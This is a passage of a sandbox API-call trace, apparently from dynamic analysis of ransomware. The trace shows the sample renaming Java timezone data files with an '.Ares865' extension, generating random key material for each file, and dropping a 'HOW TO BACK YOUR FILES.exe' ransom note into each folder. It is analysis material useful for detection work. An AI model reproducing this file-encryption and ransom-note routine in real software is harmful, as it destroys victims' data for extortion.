(lpString="Darwin") returned 6 [0134.314] lstrlenW (lpString="Ares865") returned 7 [0134.314] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin.Ares865") returned 64 [0134.315] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\darwin"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\darwin.ares865"), dwFlags=0x1) returned 1 [0134.316] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\darwin.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.316] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=125) returned 1 [0134.316] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.317] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.317] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.320] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.320] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.320] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.321] lstrcpyW (in: lpString1=0x2cce464, lpString2="Eucla" | out: lpString1="Eucla") returned="Eucla" [0134.321] lstrlenW (lpString="Eucla") returned 5 [0134.321] lstrlenW (lpString="Ares865") returned 7 [0134.321] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla.Ares865") returned 63 [0134.321] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\eucla"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\eucla.ares865"), dwFlags=0x1) returned 1 [0134.323] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\eucla.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.323] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=205) returned 1 [0134.324] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.324] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.324] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.327] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.327] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.327] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.328] lstrcpyW (in: lpString1=0x2cce464, lpString2="Hobart" | out: lpString1="Hobart") returned="Hobart" [0134.328] lstrlenW (lpString="Hobart") returned 6 [0134.328] lstrlenW (lpString="Ares865") returned 7 [0134.328] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart.Ares865") returned 64 [0134.328] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\hobart"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\hobart.ares865"), dwFlags=0x1) returned 1 [0134.330] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\hobart.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.330] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1288) returned 1 [0134.331] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.331] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.331] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.333] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.334] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.334] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.335] lstrcpyW (in: lpString1=0x2cce464, lpString2="Lindeman" | out: lpString1="Lindeman") returned="Lindeman" [0134.335] lstrlenW (lpString="Lindeman") returned 8 [0134.335] lstrlenW (lpString="Ares865") returned 7 [0134.335] lstrcmpiW (lpString1="indeman", lpString2="Ares865") returned 1 [0134.335] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman.Ares865") returned 66 [0134.335] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lindeman"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lindeman.ares865"), dwFlags=0x1) returned 1 [0134.337] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lindeman.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.337] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=221) returned 1 [0134.337] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.338] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.338] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.341] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.341] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.342] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.342] lstrcpyW (in: lpString1=0x2cce464, lpString2="Lord_Howe" | out: lpString1="Lord_Howe") returned="Lord_Howe" [0134.342] lstrlenW (lpString="Lord_Howe") returned 9 [0134.342] lstrlenW (lpString="Ares865") returned 7 [0134.342] lstrcmpiW (lpString1="rd_Howe", lpString2="Ares865") returned 1 [0134.342] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe.Ares865") returned 67 [0134.343] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lord_howe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lord_howe.ares865"), dwFlags=0x1) returned 1 [0134.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lord_howe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.345] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1012) returned 1 [0134.345] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.346] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.346] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.348] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.348] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.348] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.349] lstrcpyW (in: lpString1=0x2cce464, lpString2="Melbourne" | out: lpString1="Melbourne") returned="Melbourne" [0134.349] lstrlenW (lpString="Melbourne") returned 9 [0134.349] lstrlenW (lpString="Ares865") returned 7 [0134.349] lstrcmpiW (lpString1="lbourne", lpString2="Ares865") returned 1 [0134.349] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne.Ares865") returned 67 [0134.349] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\melbourne"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\melbourne.ares865"), dwFlags=0x1) returned 1 [0134.351] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\melbourne.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.351] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1224) returned 1 [0134.352] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.352] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.352] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.354] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.355] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.355] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.356] lstrcpyW (in: lpString1=0x2cce464, lpString2="Perth" | out: lpString1="Perth") returned="Perth" [0134.356] lstrlenW (lpString="Perth") returned 5 [0134.356] lstrlenW (lpString="Ares865") returned 7 [0134.356] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth.Ares865") returned 63 [0134.356] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\perth"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\perth.ares865"), dwFlags=0x1) returned 1 [0134.360] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\perth.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.360] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=205) returned 1 [0134.360] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.361] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.361] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.365] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.366] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.366] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.366] lstrcpyW (in: lpString1=0x2cce464, lpString2="Sydney" | out: lpString1="Sydney") returned="Sydney" [0134.366] lstrlenW (lpString="Sydney") returned 6 [0134.366] lstrlenW (lpString="Ares865") returned 7 [0134.367] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney.Ares865") returned 64 [0134.367] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\sydney"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\sydney.ares865"), dwFlags=0x1) returned 1 [0134.368] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\sydney.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.368] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1224) returned 1 [0134.369] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.369] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.369] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.372] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.372] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.372] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.373] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic" [0134.373] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic" [0134.373] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0134.373] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\how to back your files.exe"), bFailIfExists=1) returned 0 [0134.374] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0134.375] GetLastError () returned 0x0 [0134.375] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0134.375] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74613b80, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52b3a000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52b3a000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0134.375] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0134.375] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0134.375] lstrcpyW (in: lpString1=0x2cce462, lpString2="Azores" | out: lpString1="Azores") returned="Azores" [0134.375] lstrlenW (lpString="Azores") returned 6 [0134.375] lstrlenW (lpString="Ares865") returned 7 [0134.376] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores.Ares865") returned 63 [0134.376] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\azores"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\azores.ares865"), dwFlags=0x1) returned 1 [0134.377] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\azores.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.377] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1868) returned 1 [0134.378] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.378] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.378] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.381] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.382] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.382] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.382] lstrcpyW (in: lpString1=0x2cce462, lpString2="Bermuda" | out: lpString1="Bermuda") returned="Bermuda" [0134.382] lstrlenW (lpString="Bermuda") returned 7 [0134.382] lstrlenW (lpString="Ares865") returned 7 [0134.382] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda.Ares865") returned 64 [0134.383] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\bermuda"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\bermuda.ares865"), dwFlags=0x1) returned 1 [0134.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\bermuda.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.384] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1124) returned 1 [0134.385] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.385] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.385] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.388] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.388] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.388] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.389] lstrcpyW (in: lpString1=0x2cce462, lpString2="Canary" | out: lpString1="Canary") returned="Canary" [0134.389] lstrlenW (lpString="Canary") returned 6 [0134.389] lstrlenW (lpString="Ares865") returned 7 [0134.389] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary.Ares865") returned 63 [0134.389] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\canary"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\canary.ares865"), dwFlags=0x1) returned 1 [0134.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\canary.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.391] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1044) returned 1 [0134.391] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.392] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.392] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.394] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.394] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.395] lstrcpyW (in: lpString1=0x2cce462, lpString2="Cape_Verde" | out: lpString1="Cape_Verde") returned="Cape_Verde" [0134.395] lstrlenW (lpString="Cape_Verde") returned 10 [0134.395] lstrlenW (lpString="Ares865") returned 7 [0134.395] lstrcmpiW (lpString1="e_Verde", lpString2="Ares865") returned 1 [0134.395] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde.Ares865") returned 67 [0134.395] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\cape_verde"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\cape_verde.ares865"), dwFlags=0x1) returned 1 [0134.397] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\cape_verde.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.398] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=97) returned 1 [0134.398] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.398] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.399] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.401] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, 